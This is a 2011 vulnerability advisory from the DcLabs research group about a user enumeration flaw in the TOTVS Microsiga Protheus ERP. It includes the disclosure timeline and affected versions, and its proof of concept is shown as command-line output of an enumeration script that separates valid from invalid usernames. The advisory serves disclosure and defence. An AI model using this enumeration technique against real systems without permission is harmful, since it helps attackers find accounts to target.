Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25885
HistoryMar 09, 2011 - 12:00 a.m.

[DCA-2011-0002]: TOTVS ERP Microsiga Protheus - Users Enumeration

2011-03-0900:00:00
vulners.com
54
totvs erp microsiga protheus
users enumeration
low impact
security advisory

[DCA-2011-0002]

[Discussion]

  • DcLabs Security Research Group advises about following vulnerability(ies):

[Software]

  • TOTVS ERP Microsiga Protheus

[Vendor Product Description - Portuguese]

  • Software de Gestão - TOTVS
    A TOTVS é uma empresa de software, inovação, relacionamento e suporte
    à gestão, líder absoluta no Brasil, com 49,1% de share de mercado, e
    também na América Latina, com 31,2%*, é a maior empresa de softwares
    aplicativos sediada em países emergentes e a 7ª maior do mundo no
    setor.Tem mais de 25,2 mil clientes ativos, conta com o apoio de 9 mil
    participantes e está presente em 23 países.
    Proposta de Valor
    Tornar a empresa mais competitiva, com maior velocidade de decisão,
    oferecendo soluções que organizam, disciplinam, definem e impõem
    processos, armazenam dados, geram informação e auxiliam a gestão.
  • Fonte: http://totvs.com.br/web/guest/software

[Advisory Timeline]

  • 02/Feb/2011 -> Initial contact to vendor, security contact request.
  • 03/Feb/2011 -> Security contact response.
  • 03/Feb/2011 -> First notification sent, release date set to March 01, 2011.
  • 04/Feb/2011 -> Vendor confirms notification received.
  • 21/Feb/2011 -> Situation report requested.
  • 01/Mar/2011 -> No vendor response.
  • 02/Mar/2011 -> Advisory published.

[Bug Summary]

  • Users enumeration

[Impact]

  • Low

[Affected Version]

  • Microsiga Protheus 8 (20081215030344)
  • Microsiga Protheus 10 (20100812040605)
  • Other versions can also be affected but weren't tested.

[Bug Description and Proof of Concept]

  • The server validates the user before asking for a password, thus we
    can keep trying usernames until we get a password prompt.

  • A Proof of Concept has been created:

— command line output begin —
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h
usage: totvs_users_enumerator.py [options] [filename]
-h for help

options:
–version show program's version number and exit
-h, --help show this help message and exit
-i IPADDRESS, --ipaddress=IPADDRESS
Server IP address
-p PORT, --port=PORT Port number (defaults to 1234)
-t TARGET, --target=TARGET
Target Version: 8 -> Protheus 8 | 10 -> Protheus 10.
Defaults to 10

[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10
–ipaddress 192.168.4.95 userlist
Valid user: admin
Invalid user: fakeuser
Invalid user: nobody
Valid user: jonas
Valid user: fernando
Invalid user: elvis
— command line output end —


All flaws described here were discovered and researched by:
Flávio do Carmo Júnior aka waKKu.
DcLabs Security Research Group
carmo.flavio <AT> dclabs <DOT> com <DOT> br

[Workarounds]

  • An initial workaround was provided to block user after 3 failed
    password attempts, but it doesn't work against this kind of users
    enumeration.

[Credits]
DcLabs Security Research Group.

Atenciosamente,

Flávio do Carmo Júnior aka waKKu @ DcLabs
Florianópolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com